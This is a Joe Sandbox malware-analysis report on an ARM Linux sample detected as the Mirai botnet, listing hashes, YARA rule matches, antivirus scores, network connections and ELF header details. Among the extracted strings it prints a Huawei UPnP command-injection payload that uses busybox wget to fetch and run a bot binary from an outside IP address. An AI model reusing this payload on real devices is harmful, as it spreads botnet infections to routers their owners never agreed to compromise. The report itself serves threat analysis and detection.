Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
YRg7imX8bv.elf

Overview

General Information

Sample name:YRg7imX8bv.elf
renamed because original name is a hash value
Original sample name:e572522adf7ff632043e28c885caa41c.elf
Analysis ID:1436482
MD5:e572522adf7ff632043e28c885caa41c
SHA1:8af603c3694407a80aac3d78e844f1b6b7ea0381
SHA256:ed3c3706a1c12ea0fe1b3f47a7128289b36fe2a0f23b11f2230cf0b3df058d58
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1436482
Start date and time:2024-05-05 15:58:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:YRg7imX8bv.elf
renamed because original name is a hash value
Original Sample Name:e572522adf7ff632043e28c885caa41c.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@0/0
Command:/tmp/YRg7imX8bv.elf
PID:6244
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • YRg7imX8bv.elf (PID: 6244, Parent: 6149, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/YRg7imX8bv.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
YRg7imX8bv.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    YRg7imX8bv.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      YRg7imX8bv.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
      • 0xfa94:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
      YRg7imX8bv.elfMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
      • 0xfa38:$x2: /dev/misc/watchdog
      • 0xfa28:$x3: /dev/watchdog
      • 0xfaa0:$s5: HWCLVGAJ
      SourceRuleDescriptionAuthorStrings
      6250.1.00007f574c017000.00007f574c028000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6250.1.00007f574c017000.00007f574c028000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          6250.1.00007f574c017000.00007f574c028000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0xfa94:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          6250.1.00007f574c017000.00007f574c028000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
          • 0xfa38:$x2: /dev/misc/watchdog
          • 0xfa28:$x3: /dev/watchdog
          • 0xfaa0:$s5: HWCLVGAJ
          6244.1.00007f574c017000.00007f574c028000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            Click to see the 4 entries
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: YRg7imX8bv.elfAvira: detected
            Source: YRg7imX8bv.elfReversingLabs: Detection: 52%
            Source: YRg7imX8bv.elfVirustotal: Detection: 43%Perma Link
            Source: YRg7imX8bv.elfString: wgetcurlechobotdlr.mipsmpslx86armbinsboatnetskidsoraselfrepPOST /tmUnblock.cgi HTTP/1.1
            Source: /tmp/YRg7imX8bv.elf (PID: 6244)Socket: 192.168.2.23::8345Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: YRg7imX8bv.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: YRg7imX8bv.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

            System Summary

            barindex
            Source: YRg7imX8bv.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: YRg7imX8bv.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 6250.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 6250.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 6244.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 6244.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.146.234.130 -l /tmp/a -r /mips; /bin/busybox chmod 777 /tmp/a; /tmp/a selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.146.234.130 -l /tmp/a -r /mips; /bin/busybox chmod 777 /tmp/a; /tmp/a selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: YRg7imX8bv.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: YRg7imX8bv.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: 6250.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 6250.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: 6244.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 6244.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: classification engineClassification label: mal80.troj.linELF@0/0@0/0
            Source: /tmp/YRg7imX8bv.elf (PID: 6244)Queries kernel information via 'uname': Jump to behavior
            Source: YRg7imX8bv.elf, 6244.1.000055cd5759d000.000055cd576cb000.rw-.sdmp, YRg7imX8bv.elf, 6250.1.000055cd5759d000.000055cd576cb000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: YRg7imX8bv.elf, 6244.1.00007ffdcdbb8000.00007ffdcdbd9000.rw-.sdmp, YRg7imX8bv.elf, 6250.1.00007ffdcdbb8000.00007ffdcdbd9000.rw-.sdmpBinary or memory string: Nx86_64/usr/bin/qemu-arm/tmp/YRg7imX8bv.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/YRg7imX8bv.elf
            Source: YRg7imX8bv.elf, 6244.1.000055cd5759d000.000055cd576cb000.rw-.sdmp, YRg7imX8bv.elf, 6250.1.000055cd5759d000.000055cd576cb000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: YRg7imX8bv.elf, 6244.1.00007ffdcdbb8000.00007ffdcdbd9000.rw-.sdmp, YRg7imX8bv.elf, 6250.1.00007ffdcdbb8000.00007ffdcdbd9000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: YRg7imX8bv.elf, 6250.1.00007ffdcdbb8000.00007ffdcdbd9000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: YRg7imX8bv.elf, type: SAMPLE
            Source: Yara matchFile source: 6250.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6244.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: YRg7imX8bv.elf PID: 6244, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: YRg7imX8bv.elf, type: SAMPLE
            Source: Yara matchFile source: 6250.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6244.1.00007f574c017000.00007f574c028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: YRg7imX8bv.elf PID: 6244, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path InterceptionDirect Volume AccessOS Credential Dumping11
            Security Software Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            YRg7imX8bv.elf53%ReversingLabsLinux.Trojan.Mirai
            YRg7imX8bv.elf44%VirustotalBrowse
            YRg7imX8bv.elf100%AviraEXP/ELF.Gafgyt.X
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/YRg7imX8bv.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/YRg7imX8bv.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                91.189.91.43
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                109.202.202.202Aqua.x86.elfGet hashmaliciousMiraiBrowse
                  JCS9ADM3XR.elfGet hashmaliciousMiraiBrowse
                    wlFJIK0tXZ.elfGet hashmaliciousUnknownBrowse
                      wF7Dqtsk8a.elfGet hashmaliciousMiraiBrowse
                        77a9MuTMle.elfGet hashmaliciousMiraiBrowse
                          AzlcQuUN0k.elfGet hashmaliciousUnknownBrowse
                            f4O4N5ANxE.elfGet hashmaliciousMiraiBrowse
                              q3Cpzw69fz.elfGet hashmaliciousMiraiBrowse
                                9zU9mg84VT.elfGet hashmaliciousUnknownBrowse
                                  5RdnlJAhAR.elfGet hashmaliciousMiraiBrowse
                                    91.189.91.43Aqua.x86.elfGet hashmaliciousMiraiBrowse
                                      JCS9ADM3XR.elfGet hashmaliciousMiraiBrowse
                                        wF7Dqtsk8a.elfGet hashmaliciousMiraiBrowse
                                          f4O4N5ANxE.elfGet hashmaliciousMiraiBrowse
                                            q3Cpzw69fz.elfGet hashmaliciousMiraiBrowse
                                              9zU9mg84VT.elfGet hashmaliciousUnknownBrowse
                                                5RdnlJAhAR.elfGet hashmaliciousMiraiBrowse
                                                  45RybLduC1.elfGet hashmaliciousMiraiBrowse
                                                    Od6wNV2xta.elfGet hashmaliciousBillGatesBrowse
                                                      odSNe417qU.elfGet hashmaliciousBillGatesBrowse
                                                        91.189.91.42Aqua.x86.elfGet hashmaliciousMiraiBrowse
                                                          JCS9ADM3XR.elfGet hashmaliciousMiraiBrowse
                                                            wlFJIK0tXZ.elfGet hashmaliciousUnknownBrowse
                                                              wF7Dqtsk8a.elfGet hashmaliciousMiraiBrowse
                                                                77a9MuTMle.elfGet hashmaliciousMiraiBrowse
                                                                  AzlcQuUN0k.elfGet hashmaliciousUnknownBrowse
                                                                    f4O4N5ANxE.elfGet hashmaliciousMiraiBrowse
                                                                      q3Cpzw69fz.elfGet hashmaliciousMiraiBrowse
                                                                        9zU9mg84VT.elfGet hashmaliciousUnknownBrowse
                                                                          5RdnlJAhAR.elfGet hashmaliciousMiraiBrowse
                                                                            No context
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CANONICAL-ASGBAqua.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            4UXaScBHdt.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.125.190.26
                                                                            JCS9ADM3XR.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            wlFJIK0tXZ.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            wF7Dqtsk8a.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            77a9MuTMle.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            AzlcQuUN0k.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            f4O4N5ANxE.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            q3Cpzw69fz.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            wQT6LP2bum.elfGet hashmaliciousMiraiBrowse
                                                                            • 185.125.190.26
                                                                            CANONICAL-ASGBAqua.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            4UXaScBHdt.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.125.190.26
                                                                            JCS9ADM3XR.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            wlFJIK0tXZ.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            wF7Dqtsk8a.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            77a9MuTMle.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            AzlcQuUN0k.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            f4O4N5ANxE.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            q3Cpzw69fz.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            wQT6LP2bum.elfGet hashmaliciousMiraiBrowse
                                                                            • 185.125.190.26
                                                                            INIT7CHAqua.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            JCS9ADM3XR.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            wlFJIK0tXZ.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            wF7Dqtsk8a.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            77a9MuTMle.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            AzlcQuUN0k.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            f4O4N5ANxE.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            q3Cpzw69fz.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            9zU9mg84VT.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            5RdnlJAhAR.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            No context
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                            Entropy (8bit):6.0680156151273845
                                                                            TrID:
                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                            File name:YRg7imX8bv.elf
                                                                            File size:67'040 bytes
                                                                            MD5:e572522adf7ff632043e28c885caa41c
                                                                            SHA1:8af603c3694407a80aac3d78e844f1b6b7ea0381
                                                                            SHA256:ed3c3706a1c12ea0fe1b3f47a7128289b36fe2a0f23b11f2230cf0b3df058d58
                                                                            SHA512:4cfa0a58217f099e951cb39d6744f82dc5617d445bd5a1fd48729df0a518d05d8d7cf5705d3b01e281e793d31f06b800a48341b207be27ead6d1971f73579a27
                                                                            SSDEEP:1536:FcniWdVGT8pL+1SfrzNs/kl1rv+ERnNMaijk6AhxxC:lGgT4+8W/kl1rvOk6Ahxx
                                                                            TLSH:A063084AB8C18A15C5D412BBFA2E118D331767A8E3DF7212DD206F247BCA86F0E37556
                                                                            File Content Preview:.ELF..............(.....T...4...........4. ...(.....................<...<...............<...<...<...$....(..........Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../.`.......<.....-.@0....S

                                                                            ELF header

                                                                            Class:ELF32
                                                                            Data:2's complement, little endian
                                                                            Version:1 (current)
                                                                            Machine:ARM
                                                                            Version Number:0x1
                                                                            Type:EXEC (Executable file)
                                                                            OS/ABI:UNIX - System V
                                                                            ABI Version:0
                                                                            Entry Point Address:0x8154
                                                                            Flags:0x4000002
                                                                            ELF Header Size:52
                                                                            Program Header Offset:52
                                                                            Program Header Size:32
                                                                            Number of Program Headers:3
                                                                            Section Header Offset:66520
                                                                            Section Header Size:40
                                                                            Number of Section Headers:13
                                                                            Header String Table Index:12
                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                            NULL0x00x00x00x00x0000
                                                                            .initPROGBITS0x80940x940x100x00x6AX004
                                                                            .textPROGBITS0x80b00xb00xf4200x00x6AX0016
                                                                            .finiPROGBITS0x174d00xf4d00x100x00x6AX004
                                                                            .rodataPROGBITS0x174e00xf4e00xb5c0x00x2A004
                                                                            .eh_framePROGBITS0x2003c0x1003c0x40x00x3WA004
                                                                            .init_arrayINIT_ARRAY0x200400x100400x40x00x3WA004
                                                                            .fini_arrayFINI_ARRAY0x200440x100440x40x00x3WA004
                                                                            .gotPROGBITS0x2004c0x1004c0x740x40x3WA004
                                                                            .dataPROGBITS0x200c00x100c00x2a00x00x3WA004
                                                                            .bssNOBITS0x203600x103600x25640x00x3WA004
                                                                            .ARM.attributesARM_ATTRIBUTES0x00x103600x100x00x0001
                                                                            .shstrtabSTRTAB0x00x103700x670x00x0001
                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                            LOAD0x00x80000x80000x1003c0x1003c6.09030x5R E0x8000.init .text .fini .rodata
                                                                            LOAD0x1003c0x2003c0x2003c0x3240x28884.12150x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 5, 2024 15:58:49.764883995 CEST43928443192.168.2.2391.189.91.42
                                                                            May 5, 2024 15:58:55.396083117 CEST42836443192.168.2.2391.189.91.43
                                                                            May 5, 2024 15:58:56.931914091 CEST4251680192.168.2.23109.202.202.202
                                                                            May 5, 2024 15:59:09.730267048 CEST43928443192.168.2.2391.189.91.42
                                                                            May 5, 2024 15:59:22.016442060 CEST42836443192.168.2.2391.189.91.43
                                                                            May 5, 2024 15:59:28.159665108 CEST4251680192.168.2.23109.202.202.202
                                                                            May 5, 2024 15:59:50.684472084 CEST43928443192.168.2.2391.189.91.42

                                                                            System Behavior

                                                                            Start time (UTC):13:58:46
                                                                            Start date (UTC):05/05/2024
                                                                            Path:/tmp/YRg7imX8bv.elf
                                                                            Arguments:/tmp/YRg7imX8bv.elf
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):13:58:53
                                                                            Start date (UTC):05/05/2024
                                                                            Path:/tmp/YRg7imX8bv.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1